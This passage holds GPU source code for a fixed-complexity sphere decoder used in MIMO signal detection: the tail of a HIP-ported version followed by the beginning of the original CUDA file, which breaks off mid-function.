memory // extern __shared__ hipComplex array[]; error_t error; int count1, count2,count3,count4; __shared__ float d; //the minimum distance unit between the signal constellation, the distance is usually 2d __shared__ hipComplex alpha, beta; alpha.x=1;alpha.y=0; beta.x=0; beta.y=0; // __shared__ hipComplex d_constant_shat[MATRIX_SIZE]; // __shared__ hipComplex d_R[MATRIX_SIZE*MATRIX_SIZE]; __shared__ hipComplex s_temp[threadNum]; // hipComplex s_temp[tid]; // hipComplex Eu_norm_share[tid]; __shared__ hipComplex Eu_norm_share[threadNum]; hipComplex *R_Eu_share=(hipComplex*)malloc(Nt*sizeof(hipComplex)); // if(tid>=0&&tid<MATRIX_SIZE) // { // // for(count1=0;count1<MATRIX_SIZE;count1++) // { // d_R[IDC2D(count1,tid,MATRIX_SIZE)]=d_R[IDC2D(count1,tid,MATRIX_SIZE)]; // } // // // d_constant_shat[tid]=d_constant_shat[tid]; // } // __syncthreads(); Eu[blockNum*threadNum*index+tx]=0; for (count1=Nt-1; count1>=0; 
count1--) { if (count1<Nt-rho) { s_temp[tid]=d_constant_shat[count1]; #pragma unroll for (count2=count1+1;count2<Nt; count2++) { s_temp[tid]=complex_add(s_temp[tid],complex_mulcom(complex_div(d_R[IDC2D(count1,count2,MATRIX_SIZE)],d_R[IDC2D(count1,count1,MATRIX_SIZE)]),(complex_sub(d_constant_shat[count2],s_potential_matrix[IDC2D(count2,(index*blockNum*threadNum+tx),pathNum)])))); } if(M==2) //BPSK { d=sqrt(float(float(1)/float(Nt))); if(s_temp[tid].x>0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; } else { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-d); s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; } } else if(M==4) //QPSK { int *result=(int*)malloc(sizeof(int)); memset(result,0,sizeof(int)); float *distance=(float*)malloc(M*sizeof(float)); memset(distance,0,M*sizeof(int)); d=sqrt(float(float(1)/float(Nt))); for(count2=0;count2<M;count2++) { switch(count2) { case 0: distance[count2]=sqrt(powf(s_temp[tid].x-(-d),2)+pow(s_temp[tid].y-0,2)); break; case 1: distance[count2]=sqrt(powf(s_temp[tid].x-0,2)+pow(s_temp[tid].y-(-d),2)); break; case 2: distance[count2]=sqrt(pow(s_temp[tid].x-(d),2)+pow(s_temp[tid].y-0,2)); break; case 3: distance[count2]=sqrt(pow(s_temp[tid].x-0,2)+pow(s_temp[tid].y-d,2)); break; default: #if __CUDA_ARCH__ >=300 printf("result error code %d\n", error); #endif break; } } float mini_distance; int mini_index; mini_distance=distance[0]; mini_index=1; for(count3=0;count3<M;count3++) { if(distance[count3]<mini_distance) { mini_distance=distance[count3]; mini_index=count3+1; } } switch (mini_index) { case 1: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=-d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; break; case 2: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=0; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=-d; break; case 3: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; break; case 4: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=0; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=d; break; default: #if __CUDA_ARCH__ >=300 printf("result error code %d\n", error); #endif } free(distance); free(result); } else if(M==16) //16QAM { d=sqrt(float(3)/(2* (float)(Nt*(M-1)))); if(s_temp[tid].x<(-2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-3*d); } else if(s_temp[tid].x>(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(3*d); } else if(s_temp[tid].x>=0&&s_temp[tid].x<=2*d) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; } else if(s_temp[tid].x>=(-2*d)&&s_temp[tid].x<=0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-d); } if(s_temp[tid].y<(-2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(-3*d); } else if(s_temp[tid].y>(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(3*d); } else if(s_temp[tid].y>=0&&s_temp[tid].y<=(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=d; } else if(s_temp[tid].y>=(-2*d)&&s_temp[tid].y<=0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(-d); } } else 
if(M==64) //64QAM { d=sqrt(3/(2* (float)(Nt*(M-1)))); } } else { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)]=d_psymbolconstellation[s_sub_index[IDC2D((Nt-count1-1),(index*blockNum*threadNum+tx),pathNum)]]; __syncthreads(); } R_Eu_share[count1]=complex_sub( s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)],d_constant_shat[count1]); Eu_norm_share[tid]=beta; #pragma unroll for(count3=count1;count3<MATRIX_SIZE;count3++) { Eu_norm_share[tid]=complex_add(Eu_norm_share[tid],complex_mulcom(d_R[IDC2D(count1,count3,MATRIX_SIZE)],R_Eu_share[count3])); } Eu[(index*blockNum*threadNum+tx)]=Eu[(index*blockNum*threadNum+tx)]+pow(Eu_norm_share[tid].x,2)+pow(Eu_norm_share[tid].y,2); } __syncthreads(); free(R_Eu_share); } //host void FCSD_decoding( hipComplex *R, //upper triangular matrix after cholesky factorization store in device side // hipComplex *s_sub, //the sub brute force rho vector matrix hipComplex *d_s_hat, //unconstrained estimation of transmitted symbol vector s hipComplex *s_kernel, //quantization of estimation ,decoding results // hipComplex *Eu, //Euclidean distance int Nt, //the number of transmit antennas int Nr, //the number of receive antennas int M, //modulation scheme int *list, //the permutation list hipComplex *psymbolconstellation //the symbol constellation ) { //brute force search determine the vector results of the full expansion int rho=ceil(sqrt(Nt)-1); int count1,count2; // hipComplex *ss; // ss=(hipComplex*)malloc(MATRIX_SIZE*sizeof(hipComplex)); // hipComplex *s_sub; // s_sub=(hipComplex*)malloc(pow(M,rho)*rho*sizeof(hipComplex)); //all the possible full expansion sub vector int pathNum; pathNum=pow(M,rho); // int *d_s_sub_index; // int *s_sub_index=(int*)calloc(1,rho*pow(M,rho)*sizeof(int)); int *s_sub_index,*d_s_sub_index; hipHostMalloc((void**) &s_sub_index,rho*pathNum*sizeof(int),hipHostMallocDefault); fullfact(rho,M,s_sub_index); //get the indexes of all the possible rho length symbol vectors // int blockNum=BLOCK_NUM; //determined by the path number // int pathNum=pow(M,rho); //number of search path // int threadNum=ceil(pathNum/(blockNum*stride)); //determined by the path number float *Eu,*d_Eu; hipComplex *s_potential_matrix,*d_s_potential_matrix; // Eu=(float*)calloc(1,blockNum*sizeof(float)); hipHostMalloc((void**) &Eu,pathNum*sizeof(float),hipHostMallocDefault); hipHostMalloc((void**) &s_potential_matrix,MATRIX_SIZE*pathNum*sizeof(hipComplex),hipHostMallocDefault); // hipComplex *s_potential_matrix=(hipComplex*)calloc(1,pathNum*Nt*sizeof(hipComplex)); // hipComplex *s_hat=(hipComplex*)calloc(1,Nt*sizeof(hipComplex)); // hipComplex *d_s_potential_matrix; // hipMemcpy(s_hat,d_s_hat,Nt*sizeof(MATRIX_SIZE),hipMemcpyDeviceToHost); // int *j; // j=(int*)malloc(sizeof(int)); hipblasHandle_t handle; hipblasStatus_t ret; hipError_t error; size_t pitch_R,pitch_potential,pitch_index; ret=hipblasCreate(&handle); // error=hipMalloc((void**) &d_R, MATRIX_SIZE*MATRIX_SIZE*sizeof(hipComplex)); error=hipMalloc((void**) &d_s_sub_index, rho*pathNum*sizeof(int)); error=hipMalloc((void**) &d_s_potential_matrix, pathNum*Nt*sizeof(hipComplex)); hipMemset(d_s_potential_matrix,0,pathNum*Nt*sizeof(hipComplex)); // error=hipMalloc((void**) &d_list, MATRIX_SIZE*sizeof(int)); error=hipMalloc((void**) &d_Eu, pathNum*sizeof(float)); // error=hipMalloc((void**) &d_psymbolconstellation, M*sizeof(hipComplex)); clock_t start, end; start=clock(); // hipComplex *R_constant=(hipComplex*)calloc(1,MATRIX_SIZE*MATRIX_SIZE*sizeof(hipComplex)); 
hipMemcpyToSymbol(d_R, R, MATRIX_SIZE*MATRIX_SIZE*sizeof(hipComplex),0,hipMemcpyHostToDevice); printf("%s\n",hipGetErrorString(hipGetLastError())); hipMemcpyToSymbol(d_psymbolconstellation, psymbolconstellation, M*sizeof(hipComplex),0,hipMemcpyHostToDevice); printf("%s\n",hipGetErrorString(hipGetLastError())); hipMemcpyToSymbol(d_constant_shat, d_s_hat, MATRIX_SIZE*sizeof(hipComplex),0,hipMemcpyDeviceToDevice); printf("%s\n",hipGetErrorString(hipGetLastError())); hipMemcpyToSymbol(d_list, list, MATRIX_SIZE*sizeof(int),0,hipMemcpyHostToDevice); printf("%s\n",hipGetErrorString(hipGetLastError())); // error=hipMemcpy(d_R,R,MATRIX_SIZE*MATRIX_SIZE*sizeof(hipComplex),hipMemcpyDeviceToDevice); // error=hipMemcpy(d_psymbolconstellation, psymbolconstellation, M*sizeof(hipComplex),hipMemcpyHostToDevice); // error=hipMemcpy(d_s_sub_index, s_sub_index,rho*pathNum*sizeof(int),hipMemcpyHostToDevice); // error=hipMemcpy(d_list, list, Nt*(sizeof(int)),hipMemcpyHostToDevice); int sharedMem; sharedMem=1*sizeof(hipComplex); float duration; for(count1=0;count1<stride;count1++) { hipMemcpyAsync(d_s_sub_index,s_sub_index,rho*(pathNum)*sizeof(int),hipMemcpyHostToDevice,0); // hipMemcpyAsync(s_potential_matrix,d_s_potential_matrix,MATRIX_SIZE*(pathNum)*sizeof(hipComplex),hipMemcpyHostToDevice,0); hipLaunchKernelGGL(( FEpath), dim3(blockNum), dim3(threadNum),sharedMem, 0, d_s_potential_matrix,d_s_sub_index,rho,pathNum, d_Eu, M,count1); // error=hipDeviceSynchronize(); printf("%s\n",hipGetErrorString(hipGetLastError())); hipMemcpyAsync(s_potential_matrix,d_s_potential_matrix,MATRIX_SIZE*(pathNum)*sizeof(hipComplex),hipMemcpyDeviceToHost,0); hipMemcpyAsync(Eu,d_Eu,(pathNum)*sizeof(float),hipMemcpyDeviceToHost,0); } // error=hipMemcpy(s_potential_matrix,d_s_potential_matrix, Nt*sizeof(hipComplex)*pathNum,hipMemcpyDeviceToHost); end=clock(); // hipProfilerStop(); duration=double(end-start); printf("hey %0.4f ", duration); printf("\n"); // memcpy(Eu+0,Eu1,pathNum*sizeof(float)); // memcpy(Eu+pathNum,Eu2,pathNum*sizeof(float)); // memcpy(Eu+pathNum/2,Eu3,pathNum*sizeof(float)); // memcpy(Eu+(pathNum*3)/4,Eu4,pathNum*sizeof(float)); // printf("Eu_num is %d", Eu_num); // error=hipMemcpy(s_potential_matrix,d_s_potential_matrix,pathNum*Nt*sizeof(hipComplex),hipMemcpyDeviceToHost); // printf("all the potential symbol vector is:\n"); // for(count1=0;count1<pathNum;count1++) // { // for(int count2=0;count2<Nt;count2++) // { // printf("%0.4f%+0.4fi ", s_potential_matrix[IDC2D(count1,count2,Nt)].x,s_potential_matrix[IDC2D(count1,count2,Nt)].y); // } // printf("\n"); // } // error=hipMemcpy(R,d_R,Nt*Nt*sizeof(hipComplex),hipMemcpyDeviceToHost); // printf("the test upper triangular matrix in kernel is:\n"); // for(count1=0;count1<Nt;count1++) // { // for(int count2=0;count2<Nt;count2++) // { // printf("%0.4f%+0.4fi ", R[IDC2D(count1,count2,Nt)].x,R[IDC2D(count1,count2,Nt)].y); // } // printf("\n"); // } // error=hipMemcpy(Eu,d_Eu,pathNum*sizeof(float),hipMemcpyDeviceToHost); // if(error!=hipSuccess) // { //// printf("Eu returned error code %d, line %d\n", error, __LINE__); //// exit(EXIT_FAILURE); // } //fine out the symbol vector index among all the block output Euclidean distance // int Eu_mini_index=0; // float Eu_mini_value=Eu[0]; // for(count1=0;count1<pathNum;count1++) // { // if(Eu[count1]<Eu_mini_value) // { // Eu_mini_value=Eu[count1]; // Eu_mini_index=count1; // } // } int *Eu_mini_index=(int*)malloc(sizeof(int)); hipblasIsamin(handle,pathNum,d_Eu,1,Eu_mini_index); for(count1=0;count1<Nt;count1++) { 
s_kernel[list[count1]-1]=s_potential_matrix[IDC2D((MATRIX_SIZE-count1-1),(*Eu_mini_index-1),pathNum)]; } // for(int count2=0;count2<MATRIX_SIZE;count2++) // { // printf("%0.4f%+0.4f ", s_share_matrix[IDC2D(count1,count2,MATRIX_SIZE)].x, s_share_matrix[IDC2D(count1,count2,MATRIX_SIZE)].y); // } // printf("\n"); // } // error=hipMemcpy(s_hat,d_s_hat,Nt*sizeof(hipComplex),hipMemcpyDeviceToHost); // for(count1=0;count1<pathNum;count1++) // { // printf("the unconstrained estimation is:\n"); // for(int count2=0;count2<MATRIX_SIZE;count2++) // { // printf("%0.4f%+0.4fi ", s_hat[count2].x, s_hat[count2].y); // } // printf("\n"); // } printf("the s_kernel is :\n"); for(count1=0;count1<Nt;count1++) { printf("%0.4f%+0.4fi ", s_kernel[count1].x, s_kernel[count1].y); } printf("\n"); hipHostFree(s_sub_index); hipFree(d_s_sub_index); // hipFree(d_list); hipHostFree(Eu); hipFree(d_Eu); hipHostFree(s_potential_matrix); hipFree(d_s_potential_matrix); // hipFree(d_psymbolconstellation); free(Eu_mini_index); // hipFree(d_R); }
3e8132cbe7e75844f0c390f68c2bb39b08983e2b.cu
/* * * Copyright 1993-2012 NVIDIA Corporation. All rights reserved. * * Please refer to the NVIDIA end user license agreement (EULA) associated * with this source code for terms and conditions that govern your use of * this software. Any use, reproduction, disclosure, or distribution of * this software and related documentation outside the terms of the EULA * is strictly prohibited. */ /* * this function implement fixed complexity sphere decoding * INPUT: * y: received signal * H: permuted propagation matrix * M: modulation scheme, (2: BPSK 4: QPSK, 16: 16QAM, 64: 64QAM) * psymbolconstellation: the symbol constellation * OUTPUT: * s: detection result * Eu: Euclidean distance */ #include <stdio.h> #include <stdlib.h> #include<cuComplex.h> #include <string.h> #include<math.h> #include<cuda_runtime.h> #include<cuda.h> #include<cublas_v2.h> #include<time.h> #include"cu_complex_operation.cuh" #include"common.h" #include<cuda_runtime.h> #include<cuda.h> #include<cudaProfiler.h> #include<cuda_profiler_api.h> #include<device_functions.h> #define threadNum 1024 #define blockNum 4 #define stride 1 /* * in this version I applied colesced memory accesss to all the vector and matrix, with all the matrix stored in row major different threads reading one column * with all the matrix stored in column major, different threads reading one row * uitilize consecutive computation power */ __constant__ cuComplex d_R[MATRIX_SIZE*MATRIX_SIZE],d_psymbolconstellation[16],d_constant_shat[MATRIX_SIZE]; __constant__ int d_list[MATRIX_SIZE]; __global__ void FEpath( // cuComplex *d_R, //upper triangular matrix after cholesky factorization // cuComplex *d_constant_shat, //unconstrained estimation of transmitted symbol vector s // cuComplex *s_matrix_share, cuComplex *s_potential_matrix, //the matrix use to store all the solution candidates from all the blocks int *s_sub_index, //full factorial index matrix int rho, int pathNum, // cuComplex *s, //decoding results float *Eu, //Euclidean distance // int pitch_R, //the number of transmit antennas // int pitch_index, //the number of receive antennas // int pitch_p, int M, //modulation scheme // int threadNum, //number of threads // int *d_list, //the permutation list // cuComplex *d_psymbolconstellation, int index ) { //need to consider the resource allocation int tx=blockIdx.x*blockDim.x+threadIdx.x; //if the path number is small we can allocate the kernel into one block so that we can use the shared memory int tid=threadIdx.x; int Nt=MATRIX_SIZE; //allocate shared memory // extern __shared__ cuComplex array[]; error_t error; int count1, count2,count3,count4; __shared__ float d; //the minimum distance unit between the signal constellation, the distance is usually 2d __shared__ cuComplex alpha, beta; alpha.x=1;alpha.y=0; beta.x=0; beta.y=0; // __shared__ cuComplex d_constant_shat[MATRIX_SIZE]; // __shared__ cuComplex d_R[MATRIX_SIZE*MATRIX_SIZE]; __shared__ cuComplex s_temp[threadNum]; // cuComplex s_temp[tid]; // cuComplex Eu_norm_share[tid]; __shared__ cuComplex Eu_norm_share[threadNum]; cuComplex *R_Eu_share=(cuComplex*)malloc(Nt*sizeof(cuComplex)); // if(tid>=0&&tid<MATRIX_SIZE) // { // // for(count1=0;count1<MATRIX_SIZE;count1++) // { // d_R[IDC2D(count1,tid,MATRIX_SIZE)]=d_R[IDC2D(count1,tid,MATRIX_SIZE)]; // } // // // d_constant_shat[tid]=d_constant_shat[tid]; // } // __syncthreads(); Eu[blockNum*threadNum*index+tx]=0; for (count1=Nt-1; count1>=0; count1--) { if (count1<Nt-rho) { s_temp[tid]=d_constant_shat[count1]; #pragma unroll for (count2=count1+1;count2<Nt; 
count2++) { s_temp[tid]=complex_add(s_temp[tid],complex_mulcom(complex_div(d_R[IDC2D(count1,count2,MATRIX_SIZE)],d_R[IDC2D(count1,count1,MATRIX_SIZE)]),(complex_sub(d_constant_shat[count2],s_potential_matrix[IDC2D(count2,(index*blockNum*threadNum+tx),pathNum)])))); } if(M==2) //BPSK { d=sqrt(float(float(1)/float(Nt))); if(s_temp[tid].x>0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; } else { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-d); s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; } } else if(M==4) //QPSK { int *result=(int*)malloc(sizeof(int)); memset(result,0,sizeof(int)); float *distance=(float*)malloc(M*sizeof(float)); memset(distance,0,M*sizeof(int)); d=sqrt(float(float(1)/float(Nt))); for(count2=0;count2<M;count2++) { switch(count2) { case 0: distance[count2]=sqrt(powf(s_temp[tid].x-(-d),2)+pow(s_temp[tid].y-0,2)); break; case 1: distance[count2]=sqrt(powf(s_temp[tid].x-0,2)+pow(s_temp[tid].y-(-d),2)); break; case 2: distance[count2]=sqrt(pow(s_temp[tid].x-(d),2)+pow(s_temp[tid].y-0,2)); break; case 3: distance[count2]=sqrt(pow(s_temp[tid].x-0,2)+pow(s_temp[tid].y-d,2)); break; default: #if __CUDA_ARCH__ >=300 printf("result error code %d\n", error); #endif break; } } float mini_distance; int mini_index; mini_distance=distance[0]; mini_index=1; for(count3=0;count3<M;count3++) { if(distance[count3]<mini_distance) { mini_distance=distance[count3]; mini_index=count3+1; } } switch (mini_index) { case 1: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=-d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; break; case 2: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=0; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=-d; break; case 3: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; break; case 4: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=0; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=d; break; default: #if __CUDA_ARCH__ >=300 printf("result error code %d\n", error); #endif } free(distance); free(result); } else if(M==16) //16QAM { d=sqrt(float(3)/(2* (float)(Nt*(M-1)))); if(s_temp[tid].x<(-2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-3*d); } else if(s_temp[tid].x>(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(3*d); } else if(s_temp[tid].x>=0&&s_temp[tid].x<=2*d) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; } else if(s_temp[tid].x>=(-2*d)&&s_temp[tid].x<=0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-d); } if(s_temp[tid].y<(-2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(-3*d); } else if(s_temp[tid].y>(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(3*d); } else if(s_temp[tid].y>=0&&s_temp[tid].y<=(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=d; } else if(s_temp[tid].y>=(-2*d)&&s_temp[tid].y<=0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(-d); } } else if(M==64) //64QAM { d=sqrt(3/(2* (float)(Nt*(M-1)))); } } else { 
s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)]=d_psymbolconstellation[s_sub_index[IDC2D((Nt-count1-1),(index*blockNum*threadNum+tx),pathNum)]]; __syncthreads(); } R_Eu_share[count1]=complex_sub( s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)],d_constant_shat[count1]); Eu_norm_share[tid]=beta; #pragma unroll for(count3=count1;count3<MATRIX_SIZE;count3++) { Eu_norm_share[tid]=complex_add(Eu_norm_share[tid],complex_mulcom(d_R[IDC2D(count1,count3,MATRIX_SIZE)],R_Eu_share[count3])); } Eu[(index*blockNum*threadNum+tx)]=Eu[(index*blockNum*threadNum+tx)]+pow(Eu_norm_share[tid].x,2)+pow(Eu_norm_share[tid].y,2); } __syncthreads(); free(R_Eu_share); } //host void FCSD_decoding( cuComplex *R, //upper triangular matrix after cholesky factorization store in device side // cuComplex *s_sub, //the sub brute force rho vector matrix cuComplex *d_s_hat, //unconstrained estimation of transmitted symbol vector s cuComplex *s_kernel, //quantization of estimation ,decoding results // cuComplex *Eu, //Euclidean distance int Nt, //the number of transmit antennas int Nr, //the number of receive antennas int M, //modulation scheme int *list, //the permutation list cuComplex *psymbolconstellation //the symbol constellation ) { //brute force search determine the vector results of the full expansion int rho=ceil(sqrt(Nt)-1); int count1,count2; // cuComplex *ss; // ss=(cuComplex*)malloc(MATRIX_SIZE*sizeof(cuComplex)); // cuComplex *s_sub; // s_sub=(cuComplex*)malloc(pow(M,rho)*rho*sizeof(cuComplex)); //all the possible full expansion sub vector int pathNum; pathNum=pow(M,rho); // int *d_s_sub_index; // int *s_sub_index=(int*)calloc(1,rho*pow(M,rho)*sizeof(int)); int *s_sub_index,*d_s_sub_index; cudaHostAlloc((void**) &s_sub_index,rho*pathNum*sizeof(int),cudaHostAllocDefault); fullfact(rho,M,s_sub_index); //get the indexes of all the possible rho length symbol vectors // int blockNum=BLOCK_NUM; //determined by the path number // int pathNum=pow(M,rho); //number of search path // int threadNum=ceil(pathNum/(blockNum*stride)); //determined by the path number float *Eu,*d_Eu; cuComplex *s_potential_matrix,*d_s_potential_matrix; // Eu=(float*)calloc(1,blockNum*sizeof(float)); cudaHostAlloc((void**) &Eu,pathNum*sizeof(float),cudaHostAllocDefault); cudaHostAlloc((void**) &s_potential_matrix,MATRIX_SIZE*pathNum*sizeof(cuComplex),cudaHostAllocDefault); // cuComplex *s_potential_matrix=(cuComplex*)calloc(1,pathNum*Nt*sizeof(cuComplex)); // cuComplex *s_hat=(cuComplex*)calloc(1,Nt*sizeof(cuComplex)); // cuComplex *d_s_potential_matrix; // cudaMemcpy(s_hat,d_s_hat,Nt*sizeof(MATRIX_SIZE),cudaMemcpyDeviceToHost); // int *j; // j=(int*)malloc(sizeof(int)); cublasHandle_t handle; cublasStatus_t ret; cudaError_t error; size_t pitch_R,pitch_potential,pitch_index; ret=cublasCreate(&handle); // error=cudaMalloc((void**) &d_R, MATRIX_SIZE*MATRIX_SIZE*sizeof(cuComplex)); error=cudaMalloc((void**) &d_s_sub_index, rho*pathNum*sizeof(int)); error=cudaMalloc((void**) &d_s_potential_matrix, pathNum*Nt*sizeof(cuComplex)); cudaMemset(d_s_potential_matrix,0,pathNum*Nt*sizeof(cuComplex)); // error=cudaMalloc((void**) &d_list, MATRIX_SIZE*sizeof(int)); error=cudaMalloc((void**) &d_Eu, pathNum*sizeof(float)); // error=cudaMalloc((void**) &d_psymbolconstellation, M*sizeof(cuComplex)); clock_t start, end; start=clock(); // cuComplex *R_constant=(cuComplex*)calloc(1,MATRIX_SIZE*MATRIX_SIZE*sizeof(cuComplex)); cudaMemcpyToSymbol(d_R, R, MATRIX_SIZE*MATRIX_SIZE*sizeof(cuComplex),0,cudaMemcpyHostToDevice); 
printf("%s\n",cudaGetErrorString(cudaGetLastError())); cudaMemcpyToSymbol(d_psymbolconstellation, psymbolconstellation, M*sizeof(cuComplex),0,cudaMemcpyHostToDevice); printf("%s\n",cudaGetErrorString(cudaGetLastError())); cudaMemcpyToSymbol(d_constant_shat, d_s_hat, MATRIX_SIZE*sizeof(cuComplex),0,cudaMemcpyDeviceToDevice); printf("%s\n",cudaGetErrorString(cudaGetLastError())); cudaMemcpyToSymbol(d_list, list, MATRIX_SIZE*sizeof(int),0,cudaMemcpyHostToDevice); printf("%s\n",cudaGetErrorString(cudaGetLastError())); // error=cudaMemcpy(d_R,R,MATRIX_SIZE*MATRIX_SIZE*sizeof(cuComplex),cudaMemcpyDeviceToDevice); // error=cudaMemcpy(d_psymbolconstellation, psymbolconstellation, M*sizeof(cuComplex),cudaMemcpyHostToDevice); // error=cudaMemcpy(d_s_sub_index, s_sub_index,rho*pathNum*sizeof(int),cudaMemcpyHostToDevice); // error=cudaMemcpy(d_list, list, Nt*(sizeof(int)),cudaMemcpyHostToDevice); int sharedMem; sharedMem=1*sizeof(cuComplex); float duration; for(count1=0;count1<stride;count1++) { cudaMemcpyAsync(d_s_sub_index,s_sub_index,rho*(pathNum)*sizeof(int),cudaMemcpyHostToDevice,0); // cudaMemcpyAsync(s_potential_matrix,d_s_potential_matrix,MATRIX_SIZE*(pathNum)*sizeof(cuComplex),cudaMemcpyHostToDevice,0); FEpath<<<blockNum, threadNum,sharedMem>>>(d_s_potential_matrix,d_s_sub_index,rho,pathNum, d_Eu, M,count1); // error=cudaDeviceSynchronize(); printf("%s\n",cudaGetErrorString(cudaGetLastError())); cudaMemcpyAsync(s_potential_matrix,d_s_potential_matrix,MATRIX_SIZE*(pathNum)*sizeof(cuComplex),cudaMemcpyDeviceToHost,0); cudaMemcpyAsync(Eu,d_Eu,(pathNum)*sizeof(float),cudaMemcpyDeviceToHost,0); } // error=cudaMemcpy(s_potential_matrix,d_s_potential_matrix, Nt*sizeof(cuComplex)*pathNum,cudaMemcpyDeviceToHost); end=clock(); // cudaProfilerStop(); duration=double(end-start); printf("hey %0.4f ", duration); printf("\n"); // memcpy(Eu+0,Eu1,pathNum*sizeof(float)); // memcpy(Eu+pathNum,Eu2,pathNum*sizeof(float)); // memcpy(Eu+pathNum/2,Eu3,pathNum*sizeof(float)); // memcpy(Eu+(pathNum*3)/4,Eu4,pathNum*sizeof(float)); // printf("Eu_num is %d", Eu_num); // error=cudaMemcpy(s_potential_matrix,d_s_potential_matrix,pathNum*Nt*sizeof(cuComplex),cudaMemcpyDeviceToHost); // printf("all the potential symbol vector is:\n"); // for(count1=0;count1<pathNum;count1++) // { // for(int count2=0;count2<Nt;count2++) // { // printf("%0.4f%+0.4fi ", s_potential_matrix[IDC2D(count1,count2,Nt)].x,s_potential_matrix[IDC2D(count1,count2,Nt)].y); // } // printf("\n"); // } // error=cudaMemcpy(R,d_R,Nt*Nt*sizeof(cuComplex),cudaMemcpyDeviceToHost); // printf("the test upper triangular matrix in kernel is:\n"); // for(count1=0;count1<Nt;count1++) // { // for(int count2=0;count2<Nt;count2++) // { // printf("%0.4f%+0.4fi ", R[IDC2D(count1,count2,Nt)].x,R[IDC2D(count1,count2,Nt)].y); // } // printf("\n"); // } // error=cudaMemcpy(Eu,d_Eu,pathNum*sizeof(float),cudaMemcpyDeviceToHost); // if(error!=cudaSuccess) // { //// printf("Eu returned error code %d, line %d\n", error, __LINE__); //// exit(EXIT_FAILURE); // } //fine out the symbol vector index among all the block output Euclidean distance // int Eu_mini_index=0; // float Eu_mini_value=Eu[0]; // for(count1=0;count1<pathNum;count1++) // { // if(Eu[count1]<Eu_mini_value) // { // Eu_mini_value=Eu[count1]; // Eu_mini_index=count1; // } // } int *Eu_mini_index=(int*)malloc(sizeof(int)); cublasIsamin(handle,pathNum,d_Eu,1,Eu_mini_index); for(count1=0;count1<Nt;count1++) { s_kernel[list[count1]-1]=s_potential_matrix[IDC2D((MATRIX_SIZE-count1-1),(*Eu_mini_index-1),pathNum)]; } // for(int 
